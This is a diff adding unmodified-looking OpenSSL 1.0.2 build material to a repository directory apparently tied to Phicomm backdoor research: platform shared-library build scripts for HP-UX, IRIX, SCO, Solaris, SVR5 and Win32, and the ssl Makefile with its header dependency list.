+# installed items of OpenSSL.
+#
+# WARNING: At high optimization levels, HP's ANSI-C compiler can chew up
+#          large amounts of memory and CPU time. Make sure to have at least
+#          128MB of RAM available and that your kernel is configured to allow
+#          at least 128MB data size (maxdsiz parameter which can be obtained
+#          by multiplying 'echo maxdsiz/D | adb -k /stand/vmunix /dev/kmem'
+#          by 'getconf PAGE_SIZE').
+#          The installation process can take several hours, even on fast
+#          machines. +O4 optimization of the libcrypto.sl shared library may
+#          take 1 hour on a C200 (200MHz PA8200 CPU), +O3 compilation of
+#          fcrypt_b.c can take 20 minutes on this machine. Stay patient.
+#
+# SITEFLAGS: site specific flags. I do use +DAportable, since I have to
+# support older PA1.1-type CPUs. Your mileage may vary.
+# +w1 enables enhanced warnings, useful when working with snaphots.
+#
+SITEFLAGS="+DAportable +w1"
+#
+# Set the default additions to build with HP-UX.
+# -D_REENTRANT must/should be defined on HP-UX manually, since we do call
+# Configure directly.
+# +Oall increases the optimization done.
+#
+MYFLAGS="-D_REENTRANT +Oall $SITEFLAGS"
+
+# Configure for pic and build the static pic libraries
+perl5 Configure no-shared hpux-parisc-cc-o4 +Z ${MYFLAGS}
+make clean
+make DIRS="crypto ssl"
+# Rename the static pic libs and build dynamic libraries from them
+# Be prepared to see a lot of warnings about shared libraries being built
+# with optimizations higher than +O2. When using these libraries, it is
+# not possible to replace internal library functions with functions from
+# the program to be linked.
+#
+make -f shlib/Makefile.hpux10-cc
+
+# Copy the libraries to /usr/local/ssl/lib (they have to be in their
+# final location when linking applications).
+# If the directories are still there, no problem.
+mkdir /usr/local
+mkdir /usr/local/ssl
+mkdir /usr/local/ssl/lib
+chmod 444 lib*_pic.a
+chmod 555 lib*.sl.0.9.8
+cp -p lib*_pic.a lib*.sl.0.9.8 /usr/local/ssl/lib
+(cd /usr/local/ssl/lib ; ln -sf libcrypto.sl.0.9.8 libcrypto.sl ; ln -sf libssl.sl.0.9.8 libssl.sl)
+
+# Reconfigure without pic to compile the executables. Unfortunately, while
+# performing this task we have to recompile the library components, even
+# though we use the already installed shared libs anyway.
+#
+perl5 Configure no-shared hpux-parisc-cc-o4 ${MYFLAGS}
+
+make clean
+
+# Hack the Makefiles to pick up the dynamic libraries during linking
+#
+sed 's/^PEX_LIBS=.*$/PEX_LIBS=-L\/usr\/local\/ssl\/lib/' Makefile.ssl >xxx; mv xxx Makefile.ssl
+sed 's/-L\.\.//' apps/Makefile.ssl >xxx; mv xxx apps/Makefile.ssl
+sed 's/-L\.\.//' test/Makefile.ssl >xxx; mv xxx test/Makefile.ssl
+# Build the static libs and the executables in one make.
+make
+# Install everything
+make install
+
+# Finally build the static libs with +O3. This time we only need the libraries,
+# once created, they are simply copied into place.
+#
+perl5 Configure no-shared hpux-parisc-cc ${MYFLAGS}
+make clean
+make DIRS="crypto ssl"
+chmod 644 libcrypto.a libssl.a
+cp -p libcrypto.a libssl.a /usr/local/ssl/lib
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/irix.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/irix.sh
new file mode 100644
index 0000000..22e4e6a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/irix.sh
@@ -0,0 +1,7 @@
+FLAGS="-DTERMIOS -O2 -mips2 -DB_ENDIAN -fomit-frame-pointer -Wall -Iinclude"
+SHFLAGS="-DPIC -fpic"
+
+gcc -c -Icrypto $SHFLAGS $FLAGS -o crypto.o crypto/crypto.c
+ld -shared -o libcrypto.so crypto.o
+gcc -c -Issl $SHFLAGS $FLAGS -o ssl.o ssl/ssl.c
+ld -shared -o libssl.so ssl.o
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sco5-shared-gcc.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sco5-shared-gcc.sh
new file mode 100755
index 0000000..fe4a457
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sco5-shared-gcc.sh
@@ -0,0 +1,48 @@
+#!/bin/sh
+
+major="0"
+minor="9.7b"
+
+slib=libssl
+sh_slib=$slib.so.$major.$minor
+
+clib=libcrypto
+sh_clib=$clib.so.$major.$minor
+
+FLAGS="-O3 -fomit-frame-pointer"
+SHFLAGS="-DPIC -fPIC"
+
+touch $sh_clib
+touch $sh_slib
+
+echo collecting all object files for $clib.so
+OBJS=
+find . -name \*.o -print > allobjs
+for obj in `ar t libcrypto.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $clib.so
+gcc -G -o $sh_clib -h $sh_clib $OBJS -lnsl -lsocket
+
+rm -f $clib.so
+ln -s $sh_clib $clib.so
+
+echo collecting all object files for $slib.so
+OBJS=
+for obj in `ar t libssl.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $slib.so
+gcc -G -o $sh_slib -h $sh_slib $OBJS -L. -lcrypto
+
+rm -f $slib.so
+ln -s $sh_slib $slib.so
+
+mv libRSAglue.a libRSAglue.a.orig
+mv libcrypto.a  libcrypto.a.orig
+mv libssl.a     libssl.a.orig
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sco5-shared-installed b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sco5-shared-installed
new file mode 100755
index 0000000..5099028
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sco5-shared-installed
@@ -0,0 +1,28 @@
+#!/bin/sh
+
+major="0"
+minor="9.7b"
+
+slib=libssl
+sh_slib=$slib.so.$major.$minor
+
+clib=libcrypto
+sh_clib=$clib.so.$major.$minor
+
+# If you want them in /usr/local/lib then change INSTALLTOP to point there.
+#INSTALLTOP=/usr/local/ssl/lib
+INSTALLTOP=/usr/local/lib
+
+cp -p $sh_clib $INSTALLTOP
+cp -p $sh_slib $INSTALLTOP
+
+PWD=`pwd`
+cd $INSTALLTOP
+rm -f $INSTALLTOP/$clib.so
+ln -s $INSTALLTOP/$sh_clib $clib.so
+
+rm -f $INSTALLTOP/$slib.so
+ln -s $INSTALLTOP/$sh_slib $slib.so
+
+cd $PWD
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sco5-shared.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sco5-shared.sh
new file mode 100755
index 0000000..b3365d9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sco5-shared.sh
@@ -0,0 +1,48 @@
+#!/bin/sh
+
+major="0"
+minor="9.7b"
+
+slib=libssl
+sh_slib=$slib.so.$major.$minor
+
+clib=libcrypto
+sh_clib=$clib.so.$major.$minor
+
+FLAGS="-O -DFILIO_H -Kalloca"
+SHFLAGS="-Kpic -DPIC"
+
+touch $sh_clib
+touch $sh_slib
+
+echo collecting all object files for $clib.so
+OBJS=
+find . -name \*.o -print > allobjs
+for obj in `ar t libcrypto.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $clib.so
+cc -G -o $sh_clib -h $sh_clib $OBJS -lnsl -lsocket
+
+rm -f $clib.so
+ln -s $sh_clib $clib.so
+
+echo collecting all object files for $slib.so
+OBJS=
+for obj in `ar t libssl.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $slib.so
+cc -G -o $sh_slib -h $sh_slib $OBJS -L. -lcrypto
+
+rm -f $slib.so
+ln -s $sh_slib $slib.so
+
+mv libRSAglue.a libRSAglue.a.orig
+mv libcrypto.a  libcrypto.a.orig
+mv libssl.a     libssl.a.orig
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/solaris-sc4.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/solaris-sc4.sh
new file mode 100755
index 0000000..b0766b3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/solaris-sc4.sh
@@ -0,0 +1,42 @@
+#!/bin/sh
+
+major="1"
+
+slib=libssl
+sh_slib=$slib.so.$major
+
+clib=libcrypto
+sh_clib=$clib.so.$major
+
+echo collecting all object files for $clib.so
+OBJS=
+find . -name \*.o -print > allobjs
+for obj in `ar t libcrypto.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $clib.so
+cc -G -o $sh_clib -h $sh_clib $OBJS -lnsl -lsocket
+
+rm -f $clib.so
+ln -s $sh_clib $clib.so
+
+echo collecting all object files for $slib.so
+OBJS=
+for obj in `ar t libssl.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $slib.so
+cc -G -o $sh_slib -h $sh_slib $OBJS -L. -lcrypto
+	
+rm -f $slib.so
+ln -s $sh_slib $slib.so
+
+rm -f allobjs
+
+mv libRSAglue.a libRSAglue.a.orig
+mv libcrypto.a  libcrypto.a.orig
+mv libssl.a     libssl.a.orig 
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/solaris.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/solaris.sh
new file mode 100644
index 0000000..83dcef0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/solaris.sh
@@ -0,0 +1,36 @@
+#!/bin/sh
+
+echo "#define DATE      \"`date`\"" >crypto/date.h
+
+major="0"
+minor="8.0"
+slib=libssl
+clib=libcrypto
+CC=gcc
+CPP='gcc -E'
+AS=as
+#FLAGS='-DTERMIOS -O3 -DL_ENDIAN -fomit-frame-pointer -mv8 -Wall'
+FLAGS='-DTERMIOS -g2 -ggdb -DL_ENDIAN -Wall -DREF_CHECK -DCRYPTO_MDEBUG'
+INCLUDE='-Iinclude -Icrypto -Issl'
+SHFLAGS='-DPIC -fpic'
+
+CFLAGS="$FLAGS $INCLUDE $SHFLAGS"
+ASM_OBJ="";
+
+echo compiling bignum assember
+$AS -o bn_asm.o crypto/bn/asm/sparc.s
+CFLAGS="$CFLAGS -DBN_ASM"
+ASM_OBJ="$ASM_OBJ bn_asm.o"
+
+echo compiling $clib
+$CC -c $CFLAGS -DCFLAGS="\"$FLAGS\"" -o crypto.o crypto/crypto.c
+
+echo linking $clib.so
+gcc $CFLAGS -shared -o $clib.so.$major.$minor crypto.o $ASM_OBJ -lnsl -lsocket
+
+echo compiling $slib.so
+$CC -c $CFLAGS -o ssl.o ssl/ssl.c
+
+echo building $slib.so
+gcc $CFLAGS -shared -o $slib.so ssl.o -L. -lcrypto
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sun.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sun.sh
new file mode 100644
index 0000000..f88e8f7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/sun.sh
@@ -0,0 +1,8 @@
+FLAGS="-DTERMIOS -O3 -DB_ENDIAN -fomit-frame-pointer -mv8 -Wall -Iinclude"
+SHFLAGS="-DPIC -fpic"
+
+gcc -c -Icrypto $SHFLAGS -fpic $FLAGS -o crypto.o crypto/crypto.c
+ld -G -z text -o libcrypto.so crypto.o
+
+gcc -c -Issl $SHFLAGS $FLAGS -o ssl.o ssl/ssl.c
+ld -G -z text -o libssl.so ssl.o
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/svr5-shared-gcc.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/svr5-shared-gcc.sh
new file mode 100755
index 0000000..c5d0cc5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/svr5-shared-gcc.sh
@@ -0,0 +1,48 @@
+#!/usr/bin/sh
+
+major="0"
+minor="9.7b"
+
+slib=libssl
+sh_slib=$slib.so.$major.$minor
+
+clib=libcrypto
+sh_clib=$clib.so.$major.$minor
+
+FLAGS="-O3 -DFILIO_H -fomit-frame-pointer -pthread"
+SHFLAGS="-DPIC -fPIC"
+
+touch $sh_clib
+touch $sh_slib
+
+echo collecting all object files for $clib.so
+OBJS=
+find . -name \*.o -print > allobjs
+for obj in `ar t libcrypto.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $clib.so
+gcc -G -o $sh_clib -h $sh_clib $OBJS -lnsl -lsocket
+
+rm -f $clib.so
+ln -s $sh_clib $clib.so
+
+echo collecting all object files for $slib.so
+OBJS=
+for obj in `ar t libssl.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $slib.so
+gcc -G -o $sh_slib -h $sh_slib $OBJS -L. -lcrypto
+
+rm -f $slib.so
+ln -s $sh_slib $slib.so
+
+mv libRSAglue.a libRSAglue.a.orig
+mv libcrypto.a  libcrypto.a.orig
+mv libssl.a     libssl.a.orig
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/svr5-shared-installed b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/svr5-shared-installed
new file mode 100755
index 0000000..b1def35
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/svr5-shared-installed
@@ -0,0 +1,27 @@
+#!/usr/bin/sh
+
+major="0"
+minor="9.7b"
+
+slib=libssl
+sh_slib=$slib.so.$major.$minor
+
+clib=libcrypto
+sh_clib=$clib.so.$major.$minor
+
+# If you want them in /usr/local/lib then change INSTALLTOP to point there.
+#INSTALLTOP=/usr/local/ssl/lib
+INSTALLTOP=/usr/local/lib
+
+cp -p $sh_clib $INSTALLTOP
+cp -p $sh_slib $INSTALLTOP
+
+PWD=`pwd`
+cd $INSTALLTOP
+rm -f $INSTALLTOP/$clib.so
+ln -s $INSTALLTOP/$sh_clib $clib.so
+
+rm -f $INSTALLTOP/$slib.so
+ln -s $INSTALLTOP/$sh_slib $slib.so
+
+cd $PWD
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/svr5-shared.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/svr5-shared.sh
new file mode 100755
index 0000000..9edf26e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/svr5-shared.sh
@@ -0,0 +1,48 @@
+#!/usr/bin/sh
+
+major="0"
+minor="9.7b"
+
+slib=libssl
+sh_slib=$slib.so.$major.$minor
+
+clib=libcrypto
+sh_clib=$clib.so.$major.$minor
+
+FLAGS="-O -DFILIO_H -Kalloca -Kthread"
+SHFLAGS="-Kpic -DPIC"
+
+touch $sh_clib
+touch $sh_slib
+
+echo collecting all object files for $clib.so
+OBJS=
+find . -name \*.o -print > allobjs
+for obj in `ar t libcrypto.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $clib.so
+cc -G -o $sh_clib -h $sh_clib $OBJS -lnsl -lsocket
+
+rm -f $clib.so
+ln -s $sh_clib $clib.so
+
+echo collecting all object files for $slib.so
+OBJS=
+for obj in `ar t libssl.a`
+do
+	OBJS="$OBJS `grep $obj allobjs`"
+done
+
+echo linking $slib.so
+cc -G -o $sh_slib -h $sh_slib $OBJS -L. -lcrypto
+
+rm -f $slib.so
+ln -s $sh_slib $slib.so
+
+mv libRSAglue.a libRSAglue.a.orig
+mv libcrypto.a  libcrypto.a.orig
+mv libssl.a     libssl.a.orig
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/win32.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/win32.bat
new file mode 100755
index 0000000..2b0faaa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/win32.bat
@@ -0,0 +1,18 @@
+rem win32 dll build
+
+set OPTIONS1=-DDES_ASM -DBN_ASM -DBF_ASM -DFLAT_INC -Iout -Itmp -DL_ENDIAN
+set OPTIONS2=/W3 /WX /Ox /Gs0 /GF /Gy /nologo
+
+set OPTIONS=%OPTIONS1% %OPTIONS2%
+
+rem ml /coff /c crypto\bf\asm\b-win32.asm
+rem ml /coff /c crypto\des\asm\c-win32.asm
+rem ml /coff /c crypto\des\asm\d-win32.asm
+rem ml /coff /c crypto\bn\asm\x86nt32.asm
+
+cl /Focrypto.obj -DWIN32 %OPTIONS% -c crypto\crypto.c
+cl /Fossl.obj -DWIN32 %OPTIONS% -c ssl\ssl.c
+cl /Foeay.obj -DWIN32 %OPTIONS% -c apps\eay.c
+
+cl /Fessleay.exe %OPTIONS% eay.obj ssl.obj crypto.obj crypto\bf\asm\b-win32.obj crypto\des\asm\c-win32.obj crypto\des\asm\d-win32.obj crypto\bn\asm\x86nt32.obj user32.lib gdi32.lib ws2_32.lib
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/win32dll.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/win32dll.bat
new file mode 100755
index 0000000..844e353
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/win32dll.bat
@@ -0,0 +1,13 @@
+rem win32 dll build
+
+set OPTIONS1=-DDES_ASM -DBN_ASM -DBF_ASM -DFLAT_INC -Iout -Itmp -DL_ENDIAN
+set OPTIONS2=/W3 /WX /Ox /Gf /nologo
+
+set OPTIONS=%OPTIONS1% %OPTIONS2%
+
+cl /Felibeay32.dll /GD /MD /LD -DWIN32 %OPTIONS% ms\libeay32.def crypto\crypto.c crypto\bf\asm\b-win32.obj crypto\des\asm\c-win32.obj crypto\des\asm\d-win32.obj crypto\bn\asm\x86nt32.obj user32.lib gdi32.lib ws2_32.lib
+
+cl /Fessleay32.dll /GD /MD /LD -DWIN32 %OPTIONS% ms\ssleay32.def ssl\ssl.c libeay32.lib
+
+cl /Fessleay.exe /MD -DWIN32 %OPTIONS% apps\eay.c ssleay32.lib libeay32.lib user32.lib ws2_32.lib
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/Makefile
new file mode 100644
index 0000000..bd4b86b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/Makefile
@@ -0,0 +1,1018 @@
+#
+# OpenSSL/ssl/Makefile
+#
+
+DIR=	ssl
+TOP=	..
+CC=	cc
+INCLUDES= -I../crypto -I$(TOP) -I../include $(KRB5_INCLUDES)
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+# KRB5 stuff
+KRB5_INCLUDES=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README ssl-lib.com install.com
+TEST=ssltest.c heartbeat_test.c
+APPS=
+
+LIB=$(TOP)/libssl.a
+SHARED_LIB= libssl$(SHLIB_EXT)
+LIBSRC=	\
+	s2_meth.c   s2_srvr.c s2_clnt.c  s2_lib.c  s2_enc.c s2_pkt.c \
+	s3_meth.c   s3_srvr.c s3_clnt.c  s3_lib.c  s3_enc.c s3_pkt.c s3_both.c s3_cbc.c \
+	s23_meth.c s23_srvr.c s23_clnt.c s23_lib.c          s23_pkt.c \
+	t1_meth.c   t1_srvr.c t1_clnt.c  t1_lib.c  t1_enc.c t1_ext.c \
+	d1_meth.c   d1_srvr.c d1_clnt.c  d1_lib.c  d1_pkt.c \
+	d1_both.c d1_srtp.c \
+	ssl_lib.c ssl_err2.c ssl_cert.c ssl_sess.c \
+	ssl_ciph.c ssl_stat.c ssl_rsa.c \
+	ssl_asn1.c ssl_txt.c ssl_algs.c ssl_conf.c \
+	bio_ssl.c ssl_err.c kssl.c t1_reneg.c tls_srp.c t1_trce.c ssl_utst.c
+LIBOBJ= \
+	s2_meth.o  s2_srvr.o  s2_clnt.o  s2_lib.o  s2_enc.o s2_pkt.o \
+	s3_meth.o  s3_srvr.o  s3_clnt.o  s3_lib.o  s3_enc.o s3_pkt.o s3_both.o s3_cbc.o \
+	s23_meth.o s23_srvr.o s23_clnt.o s23_lib.o          s23_pkt.o \
+	t1_meth.o   t1_srvr.o t1_clnt.o  t1_lib.o  t1_enc.o t1_ext.o \
+	d1_meth.o   d1_srvr.o d1_clnt.o  d1_lib.o  d1_pkt.o \
+	d1_both.o d1_srtp.o\
+	ssl_lib.o ssl_err2.o ssl_cert.o ssl_sess.o \
+	ssl_ciph.o ssl_stat.o ssl_rsa.o \
+	ssl_asn1.o ssl_txt.o ssl_algs.o ssl_conf.o \
+	bio_ssl.o ssl_err.o kssl.o t1_reneg.o tls_srp.o t1_trce.o ssl_utst.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ssl.h ssl2.h ssl3.h ssl23.h tls1.h dtls1.h kssl.h srtp.h
+HEADER=	$(EXHEADER) ssl_locl.h kssl_lcl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all:	shared
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+shared: lib
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		(cd ..; $(MAKE) $(SHARED_LIB)); \
+	fi
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC); \
+	fi
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bio_ssl.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+bio_ssl.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+bio_ssl.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+bio_ssl.o: ../include/openssl/err.h ../include/openssl/evp.h
+bio_ssl.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+bio_ssl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+bio_ssl.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+bio_ssl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+bio_ssl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+bio_ssl.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+bio_ssl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+bio_ssl.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+bio_ssl.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+bio_ssl.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+bio_ssl.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+bio_ssl.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h bio_ssl.c
+d1_both.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_both.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_both.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_both.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_both.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_both.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_both.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_both.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_both.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_both.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_both.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+d1_both.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+d1_both.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+d1_both.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+d1_both.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+d1_both.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+d1_both.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+d1_both.o: ../include/openssl/x509_vfy.h d1_both.c ssl_locl.h
+d1_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_clnt.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+d1_clnt.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+d1_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_clnt.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+d1_clnt.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+d1_clnt.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+d1_clnt.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+d1_clnt.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+d1_clnt.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+d1_clnt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_clnt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_clnt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_clnt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_clnt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_clnt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_clnt.c
+d1_clnt.o: ssl_locl.h
+d1_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+d1_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_lib.c
+d1_lib.o: ssl_locl.h
+d1_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+d1_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_meth.c
+d1_meth.o: ssl_locl.h
+d1_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
